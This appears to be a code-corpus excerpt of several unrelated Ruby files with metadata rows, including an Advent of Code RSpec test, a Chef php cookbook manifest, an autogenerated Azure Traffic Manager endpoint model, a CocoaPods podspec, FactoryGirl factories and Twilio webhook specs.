lines = f.readlines.map(&:strip)
ConwayCube.new(lines)
end
it 'should be able to handle example data for part one' do
ex = with_data('fixtures/example.txt')
expect(ex.calc_part_one).to eq(112)
end
it 'should be able to handle input data for part one' do
ex = with_data('fixtures/input.txt')
expect(ex.calc_part_one).to eq(313)
end
it 'should be able to handle example data for part two' do
ex = with_data('fixtures/example.txt')
expect(ex.calc_part_two).to eq(848)
end
it 'should be able to handle input data for part two' do
ex = with_data('fixtures/input.txt')
expect(ex.calc_part_two).to eq(2640)
end
end
| 25.787879 | 60 | 0.696827 |
112a8c985f34edec7e89aa08dba69eb599114c78 | 515 | name 'php'
maintainer 'Sous Chefs'
maintainer_email '[email protected]'
license 'Apache-2.0'
description 'Installs and maintains php and php modules'
source_url 'https://github.com/sous-chefs/php'
issues_url 'https://github.com/sous-chefs/php/issues'
chef_version '>= 14.0'
version '8.0.0'
depends 'yum-epel'
supports 'amazon', '>= 2.0'
supports 'centos', '>= 7.0'
supports 'debian', '>= 9.0'
supports 'oracle', '>= 7.0'
supports 'redhat', '>= 7.0'
supports 'scientific', '>= 7.0'
supports 'ubuntu', '>= 16.04'
| 25.75 | 56 | 0.68932 |
e29c7b33d09088e8f93e4268b93444f2a8cffcf8 | 6,477 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::TrafficManager::Mgmt::V2018_02_01
module Models
#
# Class representing a Traffic Manager endpoint.
#
class Endpoint < ProxyResource
include MsRestAzure
# @return [String] The Azure Resource URI of the of the endpoint. Not
# applicable to endpoints of type 'ExternalEndpoints'.
attr_accessor :target_resource_id
# @return [String] The fully-qualified DNS name of the endpoint. Traffic
# Manager returns this value in DNS responses to direct traffic to this
# endpoint.
attr_accessor :target
# @return [EndpointStatus] The status of the endpoint. If the endpoint is
# Enabled, it is probed for endpoint health and is included in the
# traffic routing method. Possible values include: 'Enabled', 'Disabled'
attr_accessor :endpoint_status
# @return [Integer] The weight of this endpoint when using the 'Weighted'
# traffic routing method. Possible values are from 1 to 1000.
attr_accessor :weight
# @return [Integer] The priority of this endpoint when using the
# ‘Priority’ traffic routing method. Possible values are from 1 to 1000,
# lower values represent higher priority. This is an optional parameter.
# If specified, it must be specified on all endpoints, and no two
# endpoints can share the same priority value.
attr_accessor :priority
# @return [String] Specifies the location of the external or nested
# endpoints when using the ‘Performance’ traffic routing method.
attr_accessor :endpoint_location
# @return [EndpointMonitorStatus] The monitoring status of the endpoint.
# Possible values include: 'CheckingEndpoint', 'Online', 'Degraded',
# 'Disabled', 'Inactive', 'Stopped'
attr_accessor :endpoint_monitor_status
# @return [Integer] The minimum number of endpoints that must be
# available in the child profile in order for the parent profile to be
# considered available. Only applicable to endpoint of type
# 'NestedEndpoints'.
attr_accessor :min_child_endpoints
# @return [Array<String>] The list of countries/regions mapped to this
# endpoint when using the ‘Geographic’ traffic routing method. Please
# consult Traffic Manager Geographic documentation for a full list of
# accepted values.
attr_accessor :geo_mapping
#
# Mapper for Endpoint class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'Endpoint',
type: {
name: 'Composite',
class_name: 'Endpoint',
model_properties: {
id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
target_resource_id: {
client_side_validation: true,
required: false,
serialized_name: 'properties.targetResourceId',
type: {
name: 'String'
}
},
target: {
client_side_validation: true,
required: false,
serialized_name: 'properties.target',
type: {
name: 'String'
}
},
endpoint_status: {
client_side_validation: true,
required: false,
serialized_name: 'properties.endpointStatus',
type: {
name: 'String'
}
},
weight: {
client_side_validation: true,
required: false,
serialized_name: 'properties.weight',
type: {
name: 'Number'
}
},
priority: {
client_side_validation: true,
required: false,
serialized_name: 'properties.priority',
type: {
name: 'Number'
}
},
endpoint_location: {
client_side_validation: true,
required: false,
serialized_name: 'properties.endpointLocation',
type: {
name: 'String'
}
},
endpoint_monitor_status: {
client_side_validation: true,
required: false,
serialized_name: 'properties.endpointMonitorStatus',
type: {
name: 'String'
}
},
min_child_endpoints: {
client_side_validation: true,
required: false,
serialized_name: 'properties.minChildEndpoints',
type: {
name: 'Number'
}
},
geo_mapping: {
client_side_validation: true,
required: false,
serialized_name: 'properties.geoMapping',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
}
}
}
}
end
end
end
end
| 34.269841 | 79 | 0.515825 |
799a602ed66d46e73d5913c53e40c84135cb673c | 662 | Pod::Spec.new do |spec|
spec.name = 'Tweaks'
spec.version = '1.1.0'
spec.license = { :type => 'BSD' }
spec.homepage = 'https://github.com/facebook/Tweaks'
spec.authors = { 'Grant Paul' => '[email protected]', 'Kimon Tsinteris' => '[email protected]' }
spec.summary = 'Easily adjust parameters for iOS apps in development.'
spec.source = { :git => 'https://github.com/facebook/Tweaks.git', :tag => '1.1.0' }
spec.source_files = 'FBTweak/*.{h,m}'
spec.requires_arc = true
spec.social_media_url = 'https://twitter.com/fbOpenSource'
spec.framework = 'MessageUI'
spec.ios.deployment_target = '6.0'
end
| 41.375 | 102 | 0.625378 |
bfedb6757399ab10fc01b09d7874485e6deb5f93 | 607 | # Copyright (c) Universidade Federal Fluminense (UFF).
# This file is part of SAPOS. Please, consult the license terms in the LICENSE file.
# Read about factories at https://github.com/thoughtbot/factory_girl
FactoryGirl.define do
factory :accomplishment do
phase
enrollment
after_build do |obj|
if obj.phase.levels.empty?
level = FactoryGirl.create(:level)
phase_duration = FactoryGirl.create(:phase_duration, :level => level, :phase => obj.phase)
else
level = obj.phase.levels.first
end
obj.enrollment.level = level
end
end
end
| 27.590909 | 98 | 0.68369 |
1166f38962ea5801e26e168b03c10ae19aeea386 | 2,028 | require 'rails_helper'
feature 'Twilio' do
let(:message_params) { twilio_new_message_params }
let(:status_params) { twilio_status_update_params from_number: message_params['From'], sms_sid: message_params['SmsSid'] }
before do
userone = create :user
clientone = create :client, user: userone, phone_number: message_params['From']
rr = ReportingRelationship.find_by(user: userone, client: clientone)
create :text_message, reporting_relationship: rr, twilio_sid: message_params['SmsSid'], twilio_status: 'queued'
end
after do
twilio_clear_after
end
describe 'POSTs to #incoming_sms_status' do
context 'with incorrect signature' do
it 'returns a forbidden response' do
# send false as 2nd argument to send bad signature
twilio_post_sms_status status_params, false
expect(page).to have_http_status(:forbidden)
end
end
context 'with correct signature' do
it 'returns a no content response' do
twilio_post_sms_status status_params
expect(page).to have_http_status(:no_content)
end
end
context 'many requests at once', :js do
let(:user) { create :user }
let(:client) { create :client, user: user }
let(:rr) { ReportingRelationship.find_by(user: user, client: client) }
before do
visit root_path
end
it 'handles it' do
message = create :text_message, reporting_relationship: rr, inbound: false, twilio_status: 'queued'
threads = %w[first second third fourth].each_with_index.map do |status, i|
Thread.new do
status_params = twilio_status_update_params(
to_number: message.number_to,
sms_sid: message.twilio_sid,
sms_status: status
)
twilio_post_sms_status status_params, true, 'X-Request-Start' => "151752434924#{i}"
end
end
threads.map(&:join)
expect(message.reload.twilio_status).to eq 'fourth'
end
end
end
end
| 31.6875 | 124 | 0.667653 |
91282fca0a88149bd3dbeba070d593913b1a8567 | 1,929 | require 'cj4r/drivers/daily_publisher_commission_driver'
module Cj4r
class DailyPublisherCommission
class << self # Class methods
def find(*args)
options = args.extract_options!
options[:developer_key] ||= Cj4r.config[:developer_key]
options[:date] = options[:date].nil? ? 1.day.ago.strftime("%m/%d/%Y") : options[:date].strftime("%m/%d/%Y")
options[:date_type] ||= 'event'
options[:advertiser_ids] ||= ''
options[:website_ids] ||= ''
options[:action_status] ||= ''
options[:action_types] ||= ''
options[:ad_ids] ||= ''
options[:countries] ||= ''
options[:correction_status] ||= ''
options[:sort_by] ||= 'postingDate'
options[:sort_order] ||= 'desc'
case args.first
when :first then find_initial(options)
when :last then find_last(options)
when :all then find_every(options)
else find_every(options)
end
end
private
def find_initial(options)
find_every(options).first
end
def find_last(options)
find_every(options).last
end
def find_every(options)
params = FindPublisherCommissions.new(
options[:developer_key],
options[:date],
options[:date_type],
options[:advertiser_ids],
options[:website_ids],
options[:action_status],
options[:action_types],
options[:ad_ids],
options[:countries],
options[:correction_status],
options[:sort_by],
options[:sort_order])
service.findPublisherCommissions(params).out.publisherCommissions
end
def service
@service ||= PublisherCommissionServicePortType.new
end
end
end
end | 31.112903 | 130 | 0.554692 |
f7e789362c317c60c0fed994910d709e99965b2b | 187 | class CreateWeixinimgs < ActiveRecord::Migration[5.1]
def change
create_table :weixinimgs do |t|
t.references :weixin, foreign_key: true
t.timestamps
end
end
end
| 18.7 | 53 | 0.695187 |
5d98a1d601eaf627f71b3dfd4bb60a2e39a55c3f | 1,467 | # frozen_string_literal: true
require 'spec_helper'
shared_examples 'a method to squash a hash' do |joiner = '.'|
let(:hash) { { a: { b: 1, c: { d: 2 } } } }
context 'with hash values' do
let(:key1) { %w[a b].join(joiner) }
let(:key2) { %w[a c d].join(joiner) }
it 'flattens the hash' do
expect(squashed).to eq(key1 => 1, key2 => 2)
end
it { expect { hash.squash }.not_to(change { hash }) }
end
context 'with simple array value' do
let(:hash) do
{
'person' => %w[John Wick]
}
end
it 'squash also hash' do
expect(squashed).to eq(
'person[0]' => 'John',
'person[1]' => 'Wick'
)
end
end
context 'with array containing hashes' do
let(:hash) { { a: { b: [1, { x: 3, y: { z: 4 } }] } } }
let(:key) { %w[a b].join(joiner) }
let(:expected) do
{
"#{key}[0]" => 1,
"#{key}[1]#{joiner}x" => 3,
"#{key}[1]#{joiner}y#{joiner}z" => 4
}
end
it 'flattens the hash' do
expect(squashed).to eq(expected)
end
end
context 'with array containing arrays' do
let(:hash) { { a: { b: [[11, 12], [21, 22]] } } }
let(:key) { %w[a b].join(joiner) }
let(:expected) do
{
"#{key}[0][0]" => 11,
"#{key}[0][1]" => 12,
"#{key}[1][0]" => 21,
"#{key}[1][1]" => 22
}
end
it 'flattens the hash' do
expect(squashed).to eq(expected)
end
end
end
| 21.26087 | 61 | 0.483299 |
e8d65769366db596444462dd5f9f3530b9911b50 | 2,045 | module BaseObjects
def create_base_objects
@prog = FactoryGirl.create(:program, :title => 'Program')
@opt_reg = FactoryGirl.create(:option, :title => 'Regulation', :role => 'directive_kind')
@opt_com = FactoryGirl.create(:option, :title => 'Company Policy', :role => 'directive_kind')
@creg = FactoryGirl.create(:directive, :title => 'Company', :slug => 'COM1', :kind => @opt_com)
@reg = FactoryGirl.create(:directive, :title => 'Reg 1', :slug => 'REG1', :kind => @opt_reg)
@ctl = FactoryGirl.create(:control, :title => 'Control 1', :slug => 'REG1-CTL1', :description => 'x', :directive => @reg)
@cycle = FactoryGirl.create(:cycle, :program=> @prog, :start_at => '2011-01-01')
@sec = FactoryGirl.create(:section, :title => 'Section 1', :slug => 'REG1-SEC1', :description => 'x', :directive => @reg)
@sys = FactoryGirl.create(:system, :title => 'System 1', :slug => 'SYS1', :description => 'x', :infrastructure => true)
@sc = FactoryGirl.create(:system_control, :control => @ctl, :system => @sys, :cycle => @cycle, :state => :green)
@doc = FactoryGirl.create(:document, :link => 'http://cde.com/', :title => 'Cde')
@person1 = FactoryGirl.create(:person, :email => '[email protected]')
end
def test_controller_index(assign, objs)
get 'index'
response.should be_success
assigns(assign).should eq(objs)
end
def test_controller_create(assign, params)
post 'create', assign => params
response.should be_redirect
result = assigns(assign)
result.changed?.should be_false
params.each do |key, value|
result.send(key).should eq(value)
end
end
def test_controller_update(assign, obj, params)
put 'update', :id => obj.id, assign => params
response.should be_redirect
result = assigns(assign)
result.should eq(obj)
result.changed?.should be_false
params.each do |key, value|
result.send(key).should eq(value)
end
end
def test_unauth
login({}, {})
get 'index'
response.should be_unauthorized
end
end
| 40.9 | 125 | 0.649389 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.